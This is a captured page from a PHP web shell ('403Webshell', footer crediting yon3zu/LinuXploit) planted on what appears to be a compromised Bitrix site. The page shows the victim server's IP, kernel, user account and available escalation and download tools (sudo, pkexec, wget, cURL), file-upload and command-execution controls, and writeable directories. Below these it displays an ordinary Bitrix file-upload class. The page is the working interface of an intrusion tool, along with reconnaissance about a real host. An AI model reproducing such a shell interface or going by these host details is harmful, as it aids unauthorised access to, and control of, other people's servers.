403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/main/lib/ui/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/main/lib/ui/fileinputreceiver.php
<?php

namespace Bitrix\Main\UI;

use Bitrix\Main\AccessDeniedException;
use Bitrix\Main\Localization\Loc;
use Bitrix\Main\Security\Sign\Signer;
use Bitrix\Main\UI\Uploader\Uploader;

class FileInputReceiver
{
	protected $status = array();
	protected $id = "unknown";
	protected $uploader;

	const STATUS_SUCCESS      = 'success';
	const STATUS_DENIED       = 'denied';
	const STATUS_ERROR        = 'error';
	const STATUS_NEED_AUTH    = 'need_auth';
	const STATUS_INVALID_SIGN = 'invalid_sign';

	function __construct($signature)
	{
		global $USER;

		if (!$USER->IsAuthorized())
			throw new AccessDeniedException(Loc::getMessage("BXU_AccessDenied_Authorize"));

		$sign = new Signer;
		$params = unserialize(base64_decode($sign->unsign($signature, "fileinput")), ["allowed_classes" => false]);
		$this->id = $params["id"];

		$this->uploader = new Uploader($params);
		$this->uploader->setHandler("onFileIsUploaded", array($this, "handleFile"));
	}
	protected function getAgent()
	{
		return $this->uploader;
	}

	public static function sign($params = array())
	{
		$sign = new Signer();
		return $sign->sign(base64_encode(serialize($params)), "fileinput");
	}


	protected static function handleFileByPath(&$file)
	{
		$key = "default";

		$docRoot = \CBXVirtualIo::GetInstance()->CombinePath(\CTempFile::GetAbsoluteRoot());
		$file["files"][$key]["path"] = \CBXVirtualIo::GetInstance()->GetFile($file["files"][$key]["tmp_name"])->GetPathWithName();
		if (mb_strpos($file["files"][$key]["path"], $docRoot) === 0)
			$file["files"][$key]["path"] = str_replace("//", "/", "/".mb_substr($file["files"][$key]["path"], mb_strlen($docRoot)));

		$file["files"][$key]["tmp_url"] = $file["files"][$key]["url"];
		$file["type"] = $file["files"][$key]["type"];

		return true;
	}

	protected static function handleFileByHash($hash, &$file)
	{
		$file["uploadId"] = $hash;
		return true;
	}

	public function handleFile($hash, &$file)
	{
		if ($this->id == "path")
		{
			return self::handleFileByPath($file);
		}
		return self::handleFileByHash($hash, $file);
	}

	public function exec()
	{
		$this->getAgent()->checkPost();
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit